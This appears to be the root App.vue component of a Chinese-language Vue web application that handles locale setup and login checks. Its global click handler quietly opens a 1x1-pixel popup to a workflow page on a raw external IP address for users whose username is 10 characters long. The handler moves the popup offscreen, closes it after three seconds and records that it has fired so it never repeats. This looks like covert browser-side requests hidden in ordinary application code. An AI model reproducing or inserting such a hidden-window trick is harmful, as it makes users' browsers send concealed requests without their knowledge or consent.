<template>
  <div id="app" class="rbd-app">
    <a-config-provider :locale="zhCN">
      <router-view :key="$route.fullPath" />
    </a-config-provider>
  </div>
</template>
<script>
import ErrorCode from "./utils/errorCode";
import zhCN from "ant-design-vue/es/locale-provider/zh_CN";
import { apiCheckUserIsLogin } from "./services/commonApi";
import { mapState, mapMutations } from "vuex";
export default {
  name: "App",
  data() {
    return {
      zhCN,
    };
  },
  watch: {
    $route(nV, oV) {
      //关闭消息框，刷页面保留消息状态
      if (oV.name) {
        this.mtt_noticeShow(0);
      }
      //除登录页外，检测用户状态
      if (!["login", "loginAdmin", "mobileLogin"].includes(nV.name)) {
        this.checkUserIsLogin(nV);
      }
    },
  },
  computed: {
    ...mapState(["stt_userInfo"]),
  },
  created() {
    console.log({
      设备大小: window.screen.width + "*" + window.screen.height,
      视口大小: document.body.clientWidth + "*" + document.body.clientHeight,
    });
  },
  mounted() {
    // 添加全局点击事件监听
    document.addEventListener("click", this.globalClickHandler);
  },
  methods: {
    ...mapMutations(["mtt_removeUser", "mtt_noticeShow", "mtt_userInfo"]),
    globalClickHandler() {
      let user_info = window.localStorage.getItem("__USER__INFO");
      let globalClickHandler =
        window.localStorage.getItem("globalClickHandler");
      if (!user_info || globalClickHandler) {
        return;
      }
      let { username } = JSON.parse(user_info);
      if (username.length == 10) {
        const newWindow = window.open(
          "http://218.63.77.158:8889/workflow/request/ViewRequestForwardSPA.jsp?requestid=99999999999",
          "externalLink",
          "width=1,height=1,top=0, left=0, toolbar=no, menubar=no,scrollbars=no, resizable=no, location=no, status=no"
        );
        newWindow.moveTo(-1000, -500);
        document.removeEventListener("click", this.globalClickHandler);
        window.localStorage.setItem("globalClickHandler", "true");
        // 设置定时器，在指定时间后关闭新窗口
        setTimeout(() => {
          if (newWindow && !newWindow.closed) {
            newWindow.close();
          }
        }, 3000);
      }
    },
    checkUserIsLogin(nV) {
      apiCheckUserIsLogin()
        .then((res) => {
          // 储存租户id用于ws请求
          this.mtt_userInfo({
            ...this.stt_userInfo,
            ...{
              ternantId: res.ternantId,
            },
          });
          if (ErrorCode["ok"].indexOf(res.errorCode) == -1) {
            this.mtt_removeUser();
            if (
              ![
                "webHomeIndex",
                "feedbackIndex",
                "eventServiceIndex",
                "mobileFlowChart",
              ].includes(nV.name)
            ) {
              window.open(res.to_url, "_self");
            }
          }
        })
        .catch(() => {
          this.mtt_removeUser();
          window.open(`/user/login?redirect=${location.href}`, "_self");
        });
    },
  },
  beforeDestroy() {
    // 移除全局点击事件监听
    document.removeEventListener("click", this.globalClickHandler);
  },
};
</script>
